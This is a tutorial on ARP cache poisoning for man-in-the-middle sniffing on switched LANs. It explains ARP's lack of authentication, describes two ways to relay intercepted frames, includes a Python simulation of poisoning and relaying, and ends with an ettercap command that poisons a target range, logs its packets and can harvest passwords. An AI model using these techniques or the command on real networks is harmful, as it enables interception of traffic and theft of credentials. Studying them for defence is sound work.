Why is it necessary?
On a traditional hub, every frame is repeated out of every port, so all computers see all traffic. If one wants to observe the traffic on the LAN, one merely has to put a network card in promiscuous mode and turn on a packet sniffer. In a switched environment, however, the switch learns which MAC address sits behind which port and forwards each frame only to the port of its destination. This means that traffic is a bit harder to observe. The technique described here will allow us to observe traffic on a switched LAN.
How Does ARP Work?
Well, let's first take a look at how normal interaction takes place on a switched network.
Imagine we have computers Host A and Host B. We also assume that these computers have never previously communicated.
Host A would like to send Host B some data. Host A looks in its ARP cache to see whether an IP->MAC mapping for Host B exists. Since they have never communicated before, no mapping exists. Host A broadcasts an ARP Request that says, "Who has the IP of Host B? Tell Host A." Host B is listening and replies, "IP of B is at MAC of B." Host A updates its ARP table with the IP->MAC mapping. Host A can now communicate freely with Host B, having learned its location on the network.
Notes: ARP is a stateless protocol and there is absolutely no authentication to determine whether a reply actually came from the correct host, or even whether a request was ever sent. This means we can send ARP replies whenever we want, and with the exception of a few operating systems, the ARP cache of the target computer will be updated. In addition, whenever we force an update it is ephemeral: cache entries time out, and a genuine reply from the real host will restore the correct mapping, so we must re-poison often. This leads to some interesting caveats.
How Does ARP Poisoning Work?
The main idea is that we would like to observe the data going to and from other computers. Imagine we have Host A, Host B and Host M. Host M is our computer. Host M floods Host A with ARP replies that say "IP of B is at MAC of M", and floods Host B with ARP replies that say "IP of A is at MAC of M". This updates both ARP tables so that, to Host B, the attacking computer Host M is Host A, and to Host A it is Host B. So now, all traffic intended for Host B will be sent to Host M and all traffic intended for Host A will be sent to Host M. Well, this is all well and good, but right now both computers are incorrectly sending data to our computer. If the data isn't relayed, we've effectively denial-of-serviced the communication between the two computers. We must ensure that data is forwarded to the correct MAC (meaning the original, correct MAC). There are two ways to accomplish this.
1) Store a table of the original MAC addresses. When a packet arrives whose destination IP is one we spoofed, look up the correct MAC, rewrite the packet's destination MAC, and forward it on its way. (The operating system's own IP forwarding should be switched off while doing this, otherwise the kernel will route a second copy of each packet.)
2) A more elegant solution is to assume that we will only receive data from the man-in-the-middle'd computers. Then we can modify the example above as follows: Host M floods Host A with ARP replies that say "IP of B is at MAC of B XOR 0xFBEEF", and floods Host B with ARP replies that say "IP of A is at MAC of A XOR 0xFBEEF". This way we never use our own MAC address; each victim is given a unique spoofed MAC derived from the real one. When a frame arrives (the card must be in promiscuous mode) whose destination MAC is not our own, XOR the destination MAC with 0xFBEEF (zero-extended to 48 bits, so only the low 20 bits change and the multicast bit in the first octet is untouched), rewrite the frame's destination MAC with the result, and forward the frame. Because XOR is its own inverse, the same operation maps the spoofed MAC back to the real one, so no lookup table is needed. Selecting these frames can be done simply with a pcap filter on the destination MAC; the rewritten frame still has to be injected back onto the wire. One caveat: unless the ARP replies are sent with the spoofed MAC as the Ethernet source address, the switch never learns which port that MAC is on and floods frames addressed to it out of every port, which still delivers them to us but makes the attack noisier.
This sounds hard. Is there an easy way to do this?
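To make the exchange and the poisoning concrete, here is an added example (not code from the original page, and not ettercap's code) that builds raw ARP frames by hand, runs the normal request/reply between two simulated hosts whose caches accept any reply, then has Host M poison both of them and relay one constructed IPv4 frame using the lookup-table method (1); the XOR-derived MAC of method (2) is shown as a helper. The addresses, host objects and the sample payload are made up for the demonstration, and nothing touches a real network card.

```python
"""Simulated ARP resolution, cache poisoning and MITM relay (pure Python, no root, no NIC)."""
import struct

ETH_P_ARP, ETH_P_IP = 0x0806, 0x0800
ARP_REQUEST, ARP_REPLY = 1, 2
BROADCAST = "ff:ff:ff:ff:ff:ff"
MASK = 0xFBEEF  # zero-extended to 48 bits: only the low 20 bits of a MAC are flipped


def mac_bytes(mac):
    return bytes(int(x, 16) for x in mac.split(":"))


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def ip_bytes(ip):
    return bytes(int(x) for x in ip.split("."))


def ip_str(b):
    return ".".join(str(x) for x in b)


def build_arp(op, sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet II frame carrying an RFC 826 ARP packet: 14 + 28 = 42 bytes."""
    eth_dst = BROADCAST if op == ARP_REQUEST else target_mac
    eth = mac_bytes(eth_dst) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, ETH_P_IP, 6, 4, op)  # htype, ptype, hlen, plen, oper
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip) + mac_bytes(target_mac) + ip_bytes(target_ip)
    return eth + arp


def parse_arp(frame):
    """Return the ARP fields of a frame, or None if it is not an ARP frame."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    return {"op": struct.unpack("!H", frame[20:22])[0],
            "sender_mac": mac_str(frame[22:28]), "sender_ip": ip_str(frame[28:32]),
            "target_mac": mac_str(frame[32:38]), "target_ip": ip_str(frame[38:42])}


def ipv4_frame(src_mac, dst_mac, src_ip, dst_ip, payload):
    """Minimal IPv4-over-Ethernet frame for constructed sample traffic (checksum left 0)."""
    iph = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0, 0, 64, 6, 0,
                      ip_bytes(src_ip), ip_bytes(dst_ip))
    return mac_bytes(dst_mac) + mac_bytes(src_mac) + struct.pack("!H", ETH_P_IP) + iph + payload


class Host:
    """A host whose ARP cache, like most real stacks, trusts any reply it sees."""

    def __init__(self, ip, mac):
        self.ip, self.mac, self.cache = ip, mac, {}

    def receive(self, frame):
        """Process one ARP frame; returns the reply frame if one is owed, else None."""
        arp = parse_arp(frame)
        if arp is None:
            return None
        if arp["op"] == ARP_REQUEST and arp["target_ip"] == self.ip:
            self.cache[arp["sender_ip"]] = arp["sender_mac"]  # learn the asker, then answer
            return build_arp(ARP_REPLY, self.mac, self.ip, arp["sender_mac"], arp["sender_ip"])
        if arp["op"] == ARP_REPLY:
            # The flaw: no check that we asked, or that the sender really owns sender_ip.
            self.cache[arp["sender_ip"]] = arp["sender_mac"]
        return None


class Relay:
    """Host M: poisons two victims, then forwards intercepted frames to the real MAC."""

    def __init__(self, mac):
        self.mac, self.real_mac = mac, {}

    def poison(self, victim, spoofed):
        """Unsolicited reply telling `victim` that spoofed.ip is at our MAC (method 1)."""
        self.real_mac[spoofed.ip] = spoofed.mac  # remember where to relay to
        return build_arp(ARP_REPLY, self.mac, spoofed.ip, victim.mac, victim.ip)

    def forward(self, frame):
        """Method 1: look up the real MAC for the IPv4 destination and rewrite the header."""
        if struct.unpack("!H", frame[12:14])[0] != ETH_P_IP:
            return None
        real = self.real_mac.get(ip_str(frame[30:34]))  # IPv4 dst = IP header offset 16
        if real is None:
            return None  # not one of our victims; leave it alone
        return mac_bytes(real) + mac_bytes(self.mac) + frame[12:]


def xor_mac(mac):
    """Method 2: map a real MAC to its spoof twin; XOR is its own inverse, so it maps back too."""
    return mac_str((int.from_bytes(mac_bytes(mac), "big") ^ MASK).to_bytes(6, "big"))


def demo():
    """Normal resolution, then poisoning, then one relayed frame; returns what happened."""
    a = Host("10.0.0.1", "00:11:22:33:44:01")  # constructed addresses
    b = Host("10.0.0.2", "00:11:22:33:44:02")
    m = Relay("00:11:22:33:44:0f")
    # 1. A asks who has B's IP, B answers, and A's cache is now correct.
    a.receive(b.receive(build_arp(ARP_REQUEST, a.mac, a.ip, "00:00:00:00:00:00", b.ip)))
    before = dict(a.cache)
    # 2. M sends unsolicited replies to each victim; both accept them unchecked.
    a.receive(m.poison(a, b))
    b.receive(m.poison(b, a))
    # 3. A now sends B's traffic to M's MAC; M rewrites it to B's real MAC and forwards.
    intercepted = ipv4_frame(a.mac, a.cache[b.ip], a.ip, b.ip, b"GET / HTTP/1.0\r\n")
    relayed = m.forward(intercepted)
    return {"before": before, "a_cache": dict(a.cache), "b_cache": dict(b.cache),
            "intercepted_dst": mac_str(intercepted[:6]), "relayed_dst": mac_str(relayed[:6])}


if __name__ == "__main__":
    print(demo())
```

Running the script prints Host A's cache before and after poisoning (B's IP moves from B's MAC to M's), and shows the intercepted frame leaving A addressed to M but leaving M addressed to B. A real tool would replace `Host` with the actual victims, send the output of `poison` repeatedly through a raw socket or libpcap, and inject the output of `forward`; the cache logic and frame layouts are the same.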
Of course! This type of tool is a necessity for the security-aware computer user. The most full-featured ARP poisoning utility is called Ettercap. From the site: "Ettercap is a suite for man in the middle attacks on LAN. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many protocols (even ciphered ones) and includes many features for network and host analysis." This utility has a ton of other features and cool tricks, but the simplest command for our purpose is:
[root@noone ~]$ ettercap -T -q -M arp /target ip/ -w output.packets
-T text mode
-q quiet: don't print raw packet dumps
-M arp man-in-the-middle mode (we specify a type; arp, as opposed to icmp redirection)
/target ip/ of the form /1.2.3.4/ or /1.2.3.0-255/
-w output.packets write all captured packets to a pcap file
So this will log all packets to a file. In addition, we can load Ethereal (now Wireshark) and watch the capture in real time. If you are very lazy, you can use the automatic dissectors provided by ettercap to automagically sniff passwords and other random goodies.